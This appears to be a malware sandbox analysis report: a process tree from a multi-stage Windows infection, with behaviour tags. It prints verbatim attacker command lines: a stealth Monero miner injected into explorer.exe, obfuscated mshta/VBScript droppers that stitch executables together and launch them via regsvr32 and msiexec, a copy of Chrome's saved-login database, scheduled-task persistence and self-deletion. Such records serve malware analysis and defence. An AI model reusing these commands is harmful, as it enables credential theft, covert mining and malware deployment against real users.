                                                                                                                                                                                                  C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                    PID:9048
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Mon17332e41e6b.exe
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:3536
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon17332e41e6b.exe
                                                                                                                                                                                        Mon17332e41e6b.exe
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                        PID:1612
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\2147577.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\2147577.exe"
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:4836
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\491277.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\491277.exe"
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:5108
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\8481560.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\8481560.exe"
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:4008
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\4599319.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\4599319.exe"
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:4404
                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\4599319.exe"" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """" == """" for %T in ( ""C:\Users\Admin\AppData\Roaming\4599319.exe"") do taskkill /im ""%~nxT"" /f " , 0 , tRue ) )
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:2240
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\4599319.exe" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "" == "" for %T in ( "C:\Users\Admin\AppData\Roaming\4599319.exe") do taskkill /im "%~nxT" /f
                                                                                                                                                                                              9⤵
                                                                                                                                                                                                PID:4712
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE
                                                                                                                                                                                                  LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:3828
                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""/ptCSVoYGd9AYAP_3p6Sjuyj "" == """" for %T in ( ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"") do taskkill /im ""%~nxT"" /f " , 0 , tRue ) )
                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                      PID:5128
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "/ptCSVoYGd9AYAP_3p6Sjuyj " == "" for %T in ( "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE") do taskkill /im "%~nxT" /f
                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                          PID:5264
                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vbSCrIPt: cLOsE (cREAteoBject ( "wscRIPT.SHELl" ). Run ( "C:\Windows\system32\cmd.exe /q /r ECho L%Time%07> 2B_LH.IT & EcHO | SEt /P = ""MZ"" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt + WL4sXR.MY + JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S " ,0 , TRUe ) )
                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                          PID:4576
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /q /r ECho L%Time> 2B_LH.IT & EcHO | SEt /P = "MZ" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt + WL4sXR.MY + JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S
                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                              PID:4216
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                  PID:5592
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>RqS~WQ.qCt"
                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                    PID:4428
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                    regsvr32 .\BgG1KXA.y -U -S
                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                    PID:5308
                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                              taskkill /im "4599319.exe" /f
                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                              PID:5384
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\1060213.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\1060213.exe"
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                        PID:4524
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          PID:1696
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5226921.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\5226921.exe"
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:4560
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Mon1708beae021a5ff.exe
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:3600
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Mon1727c156c4abcec.exe
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:1940
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Mon17afe24e0084db3.exe
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:2044
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Mon179f74c0ff3cf1f.exe
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:2052
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Mon17bbf11fdb575d.exe
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                            PID:2288
                                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                      "C:\Windows\SysWOW64\netsh.exe"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Adds policy Run key to start application
                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                      PID:6520
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        /c del "C:\Users\Admin\Pictures\Adobe Films\EtTGsgByU8S9Eh8n2t4kfyyM.exe"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:7136
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:4284
                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:7448
                                                                                                                                                                                                          • C:\Program Files (x86)\Ulzihbdvx\tj2jd-ps8.exe
                                                                                                                                                                                                            "C:\Program Files (x86)\Ulzihbdvx\tj2jd-ps8.exe"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:7336
                                                                                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:2716
                                                                                                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:2584
                                                                                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                PID:3916
                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                  PID:748
                                                                                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:2564
                                                                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:2396
                                                                                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:2372
                                                                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:1920
                                                                                                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:1420
                                                                                                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:1204
                                                                                                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                            PID:1032
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\rgidwvt
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\rgidwvt
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                              PID:2008
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\rgidwvt
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\rgidwvt
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:6612
                                                                                                                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:1004
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon179f74c0ff3cf1f.exe
                                                                                                                                                                                                                                Mon179f74c0ff3cf1f.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                PID:3196
                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\arwaezcEANeGGpYcTIHHboFE.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\arwaezcEANeGGpYcTIHHboFE.exe"
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:5536
                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\nCgU0lmMsBiBdcZgkJYPDooN.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\nCgU0lmMsBiBdcZgkJYPDooN.exe"
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:5580
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im nCgU0lmMsBiBdcZgkJYPDooN.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\nCgU0lmMsBiBdcZgkJYPDooN.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:4844
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                          taskkill /im nCgU0lmMsBiBdcZgkJYPDooN.exe /f
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                          PID:4684
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                          timeout /t 6
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                          PID:4676
                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\nxffdhramSZwXsIR2JBVc2ky.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\nxffdhramSZwXsIR2JBVc2ky.exe"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                      PID:6272
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                        PID:5300
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                        PID:7164
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\KIXQZ9iUwiRTEfglw1daQT7a.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\KIXQZ9iUwiRTEfglw1daQT7a.exe"
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                                        PID:5832
                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\wVz87MXCIrZ0XGzM2IbubzBs.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\wVz87MXCIrZ0XGzM2IbubzBs.exe"
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:3500
                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\DmaVeLYcLe8g6W1Os33eteY7.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\DmaVeLYcLe8g6W1Os33eteY7.exe"
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:6424
                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\yHo5miNvIZ3UwPDS4GTHnLU2.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\yHo5miNvIZ3UwPDS4GTHnLU2.exe"
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:192
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\yHo5miNvIZ3UwPDS4GTHnLU2.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\yHo5miNvIZ3UwPDS4GTHnLU2.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                    PID:1440
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\yHo5miNvIZ3UwPDS4GTHnLU2.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\yHo5miNvIZ3UwPDS4GTHnLU2.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                        PID:5444
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                                                                                                                                                                          ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                            PID:7144
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                PID:5852
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                                                                                                                  PID:4140
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                  PID:1768
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                      PID:4268
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                          PID:2200
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                            PID:4420
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                            msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            PID:7536
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                      taskkill -f -iM "yHo5miNvIZ3UwPDS4GTHnLU2.exe"
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                      PID:1724
                                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\9444AjgFUzXQXmOCY9qLw8HV.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\9444AjgFUzXQXmOCY9qLw8HV.exe"
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                PID:200
                                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\lbz1TFKqjHl0YgtL6z4NgpyP.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\lbz1TFKqjHl0YgtL6z4NgpyP.exe"
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:5008
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:6544
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                        PID:5896
                                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\uYDdTxjigU1sJgALVSxzsgJt.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\uYDdTxjigU1sJgALVSxzsgJt.exe"
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:5260
                                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\vJTEO2rVLI_c1wCbhAgXggSc.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\vJTEO2rVLI_c1wCbhAgXggSc.exe"
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:6736
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\vJTEO2rVLI_c1wCbhAgXggSc.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\vJTEO2rVLI_c1wCbhAgXggSc.exe" -u
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                            PID:6744
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\2XnIeqhrvmgtXo2kY2AHwX1a.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\2XnIeqhrvmgtXo2kY2AHwX1a.exe"
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                          PID:4740
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                                                                            PID:2708
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
